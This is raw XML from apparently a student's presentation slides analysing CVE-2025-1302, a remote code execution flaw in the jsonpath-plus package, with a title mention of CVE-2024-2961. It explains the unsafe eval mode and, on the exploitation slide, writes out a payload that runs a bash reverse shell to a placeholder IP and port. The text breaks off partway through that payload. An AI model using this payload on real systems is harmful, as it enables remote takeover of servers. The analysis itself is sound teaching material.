                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0289919F-AC2B-D6E0-99C3-43896BA09AB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7573749" y="3554503"/>
            <a:ext cx="3391954" cy="451534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="186055" indent="-186055" defTabSz="742950">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="3200" i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OPPOSans H" panose="00020600040101010101" charset="-122"/>
                <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="55753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950"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="92900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625"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="130048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4pPr>
            <a:lvl5pPr marL="167195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5pPr>
            <a:lvl6pPr marL="204343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6pPr>
            <a:lvl7pPr marL="241490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7pPr>
            <a:lvl8pPr marL="2786380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8pPr>
            <a:lvl9pPr marL="3157855" indent="-186055" defTabSz="742950">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1465"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CVE-2024-2961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D550362-8109-07FE-6AEB-9CC8DD79D7DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6741899" y="3485654"/>
            <a:ext cx="837565" cy="534035"/>
            <a:chOff x="6946900" y="3202305"/>
            <a:chExt cx="837565" cy="534035"/>
          </a:xfrm>
        </p:grpSpPr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B08F9030-38A2-8FBB-8A7C-541B3F2917A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6946900" y="3202305"/>
              <a:ext cx="837565" cy="534035"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 29964"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="accent3">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="14280000" scaled="0"/>
            </a:gra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altLang="zh-CN" sz="1200" i="1"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</a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp useBgFill="1">
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA1B49D1-D6FE-EEC1-5000-78B33E6A5BA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7075170" y="3223260"/>
              <a:ext cx="581025" cy="492125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zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr lvl="0" algn="ctr">
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:defRPr sz="2400" i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  <a:effectLst>
                    <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="0B184D">
                        <a:alpha val="40000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
                  <a:ea typeface="OPPOSans H" panose="00020600040101010101" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:sym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30670B3D-973F-D203-336A-AA0EF5515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788" y="701902"/>
            <a:ext cx="2727098" cy="249299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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2023211561 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>窦子涵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AB18BDC-E54F-FC26-A9C1-A948567EB7E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926965" y="2304415"/>
            <a:ext cx="2338705" cy="43053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lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>CONTENT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9F36ECF-27EF-CC6E-BAEA-651D6486C5B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5323205" y="1574800"/>
            <a:ext cx="1546225" cy="92329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6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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>目录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492DFE7-C4AD-B97A-4D6E-74045AEA3A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6957060" y="2036445"/>
            <a:ext cx="1079500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd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C4048B4-5971-2F0C-6251-66544ABFF29D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4155440" y="2036445"/>
            <a:ext cx="1080135" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd"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270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3C11118-5A91-050B-CD74-C2D81C4EBD43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229225" y="3602355"/>
            <a:ext cx="3426260" cy="43088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lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent2">
                        <a:alpha val="20000"/>
                      </a:schemeClr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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>JSONPATH-PLUS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31ED92-F2B2-C9B0-2C1E-5BC33648BECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300980" y="2783840"/>
            <a:ext cx="4378325" cy="6155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4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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              </a:rPr>
              <a:t>CVE-2025-1302</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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srgbClr val="0B184D">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
              <a:ea typeface="优设标题黑" panose="00000500000000000000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7BABAF8-7524-F05D-18C3-DA04511DF297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8599805" y="3408045"/>
            <a:ext cx="1079500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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</a:gradFill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3BD16100-6572-1E06-240F-AA72AC7BA6DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3398520" y="2874010"/>
            <a:ext cx="1814830" cy="1157605"/>
            <a:chOff x="3398520" y="2874010"/>
            <a:chExt cx="1814830" cy="1157605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69433816-A8A1-A3E8-DE5F-CD4445CCBE60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3398520" y="2874010"/>
              <a:ext cx="1814830" cy="1157605"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 29964"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="accent3">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="14280000" scaled="0"/>
            </a:gra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altLang="zh-CN" sz="1200" i="1"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3F643C1-6BF4-E274-582F-62F45DE3FCDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3578860" y="2919095"/>
              <a:ext cx="1259205" cy="1067435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 anchorCtr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sz="6000" i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  <a:effectLst>
                    <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                      <a:srgbClr val="0B184D">
                        <a:alpha val="40000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
                  <a:ea typeface="优设标题黑" panose="00000500000000000000" charset="-122"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="6000" i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优设标题黑" panose="00000500000000000000" charset="-122"/>
                <a:ea typeface="优设标题黑" panose="00000500000000000000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D47ABBC-C558-9AA4-E9EE-43AD40E77A89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3684905" y="2665730"/>
            <a:ext cx="2249805" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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</a:gradFill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E5B43B5-802D-5748-7F9E-177BE35DB4AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3311525" y="4258310"/>
            <a:ext cx="4192905" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cap="rnd">
            <a:gradFill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</a:gradFill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7BA9DE8B-1129-62BB-5934-D6F0483D70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788" y="701902"/>
            <a:ext cx="2727098" cy="253980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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2023211561 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>窦子涵</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182841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948A4-55E1-40B3-5872-6597D3128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65184E38-0F80-52CB-B407-D0AF01906A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788" y="701902"/>
            <a:ext cx="2727098" cy="253980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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CVE-2025-1302</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0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A150609D-FCA1-CEFD-1E2E-35241608EFA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667753" y="1334631"/>
            <a:ext cx="366963" cy="366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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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5082F9-8C6D-6797-CCFA-9E55213AB697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081999" y="1133391"/>
            <a:ext cx="2448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漏洞描述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E50CF6-0294-5FD8-5B38-414DFD0CE448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674228" y="1902832"/>
            <a:ext cx="10843544" cy="7914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版本号为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1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10.3.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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之前的 </a:t>
            </a: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jsonpath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-plus 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软件包存在远程代码执行（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RCE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）漏洞，原因是输入验证不当，攻击者可以通过利用不安全的默认 </a:t>
            </a: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еvаl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=‘</a:t>
            </a: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ѕаfе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’模式执行系统上的任意代码。</a:t>
            </a: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EAD9FED4-9FB0-7D1E-4D2C-49A3501AA684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667753" y="3073016"/>
            <a:ext cx="366963" cy="366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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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1D418DE-D02D-88E4-27FC-ACC23854789B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081999" y="2871776"/>
            <a:ext cx="251544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基础知识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ACCDE78-2F7A-CABE-ED8A-1760BEBDED6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674228" y="3624248"/>
            <a:ext cx="10843544" cy="20379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JSONPath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：一种用于从 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JSON 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数据中提取特定部分的查询语言，它提供了一种简洁而强大的方式来定位和提取 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JSON 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数据中的元素。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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Jsonpath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-plus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：一个功能强大且灵活的 </a:t>
            </a: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JSONPath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实现，用于在 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JavaScript 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环境中查询和操作 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JSON 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数据结构。使用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eval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方法时，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path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参数为指定的搜索规则（</a:t>
            </a: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JSONPath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语法），可以被解析为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JS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代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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5874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E5F89-DE42-DAA2-AB3B-7CD20E106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1A080846-734E-5237-83A7-F88F794B2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788" y="701902"/>
            <a:ext cx="2727098" cy="253980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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CVE-2025-1302</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800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E898BC00-9F09-2477-2AD6-A9D30AADBF2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="1864021"/>
            <a:ext cx="366963" cy="366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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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6769A8D-0C19-09FF-17E0-7C8AAA368CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127033" y="1662781"/>
            <a:ext cx="24481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漏洞原理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7DA5827-B0B7-D525-2F60-92011793DC61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580441" y="3575839"/>
            <a:ext cx="10843544" cy="16224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漏洞点：</a:t>
            </a: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Jsonpath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-plus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的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eval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方法第一个参数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path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调用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eval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方法时，第一个参数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path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是</a:t>
            </a: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JSONPath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语法的匹配条件，同时也可以是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JS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代码，如果是代码，会调用相应方法先执行，然后把结果作为匹配条件继续进行操作。此处的代码用户完全可控，且并未进行有效的过滤，因此可以在此处输入恶意代码实现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RCE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4366CB0-AAB3-020B-4F8C-CDD66095E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853" y="1056373"/>
            <a:ext cx="5792137" cy="241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66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F54E-C90C-7BA0-20A0-196D55F0C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BAE4915C-F393-F34C-8821-18C4FAE3C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788" y="701902"/>
            <a:ext cx="2727098" cy="253980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altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CVE-2025-1302</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800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B67FE219-C25D-6F0B-472D-8C135A6000CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="1864021"/>
            <a:ext cx="366963" cy="366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19045" tIns="19045" rIns="19045" bIns="19045" anchor="ctr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7C7100F-5104-A8BB-7187-68606853259B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128636" y="1662781"/>
            <a:ext cx="24449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漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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66E432-A52B-10A2-1106-83CAAA41942B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712788" y="2432222"/>
            <a:ext cx="10843544" cy="286892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将 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path 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参数构造如下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>$..[?(p="console.log(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>this.process.mainModule.require</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>child_process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>execSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>('bash -c \"bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&gt;/&lt;port&gt; 0&gt;&amp;1\"').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>())";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ddd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>=''[['constructor']][['constructor']](p);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ddd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
